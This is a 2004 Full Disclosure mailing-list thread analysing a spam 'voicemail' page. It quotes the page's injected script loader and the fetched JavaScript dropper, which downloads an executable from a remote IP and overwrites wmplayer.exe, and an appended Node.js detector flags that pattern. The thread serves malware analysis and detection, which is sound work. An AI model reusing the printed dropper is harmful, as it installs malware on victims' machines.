Full Disclosure mailing list archives
Re: spamming trojan?
From: Michael Gargiullo <mgargiullo () warpdrive net>
Date: Wed, 16 Jun 2004 09:59:43 -0400
On Wed, 2004-06-16 at 08:23, Geo. wrote:
> Received a spam this morning claiming I have a voicemail with the link
> (warning do not click the link)
> http:-//www-1voicemailbox-net/voicemail/ (dashes added by me) which brings
> up a frames based page with one of the frames containing this
>
> function InjectedDuringRedirection(){
> showModalDialog('md.htm',window,"dialogTop:-10000\;dialogLeft:-10000\;dialogHeight:1\;dialogWidth:1\;").location="javascript:'<SCRIPT SRC=\\'http://219.234.95.124/vbox/shellscript_loader.js\\'><\/script>'";
>
> Anyone want to try and analyze what this thing is? It was spammed to about
> 30 addresses here this morning.
>
> Geo.

Here's the contents:

var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET", "http://219.234.95.124/vbox/w_e_d.exe",0);
x.Send();
var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);
s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
location.href = "mms://";

so whatever w_e_d.exe is...

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
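The script quoted in the reply above fetches a binary with Microsoft.XMLHTTP, writes it over wmplayer.exe through ADODB.Stream, then navigates to mms://. As an added example (not part of the original post), this Node.js check flags that combination statically in a script's source; the function names, the extension list and the sample script with its TEST-NET address are assumptions constructed for illustration.

```javascript
// Added example: static triage of a script for the download-and-overwrite pattern.
// SAMPLE is constructed for this example (TEST-NET address, placeholder file name).
const SAMPLE = String.raw`
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET", "http://198.51.100.7/placeholder.bin", 0);
x.Send();
var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3; s.Type = 1; s.Open();
s.Write(x.responseBody);
s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe", 2);
location.href = "mms://";
`;

// Collect capture group 1 of every match of a global regex.
function allMatches(re, text) {
  return Array.from(text.matchAll(re), (m) => m[1]);
}

function analyzeScript(src) {
  // COM member names are case-insensitive, so every pattern uses the i flag.
  const progIds = allMatches(/new\s+ActiveXObject\s*\(\s*["']([^"']+)["']/gi, src)
    .map((p) => p.toLowerCase());
  const fetches = allMatches(/\.open\s*\(\s*["'](?:GET|POST)["']\s*,\s*["']([^"']+)["']/gi, src);
  const writes = allMatches(/\.SaveToFile\s*\(\s*["']([^"']+)["']/gi, src)
    .map((p) => p.replace(/\\\\/g, "\\")); // undo string-literal escaping
  const schemes = allMatches(/location(?:\.href)?\s*=\s*["']([a-z][a-z0-9+.-]*):/gi, src)
    .map((s) => s.toLowerCase());

  const hasHttp = progIds.some((p) => /xmlhttp/.test(p));
  const hasStream = progIds.includes("adodb.stream");
  const exeWrites = writes.filter((p) => /\.(exe|dll|scr|com|bat|cmd|pif)$/i.test(p));
  return {
    progIds, fetches, writes, schemes,
    // Network fetch + binary stream + write to disk is the dropper shape.
    downloadAndWrite: hasHttp && hasStream && fetches.length > 0 && writes.length > 0,
    writesExecutable: exeWrites.length > 0,
    // Navigating to a non-web scheme hands control to a locally registered handler.
    handlerLaunch: schemes.some((s) => !["http", "https", "javascript", "about"].includes(s)),
  };
}

console.log(analyzeScript(SAMPLE));
```

A script that only uses Microsoft.XMLHTTP for an ordinary request leaves all three flags false, so the check keys on the combination rather than on any single object name.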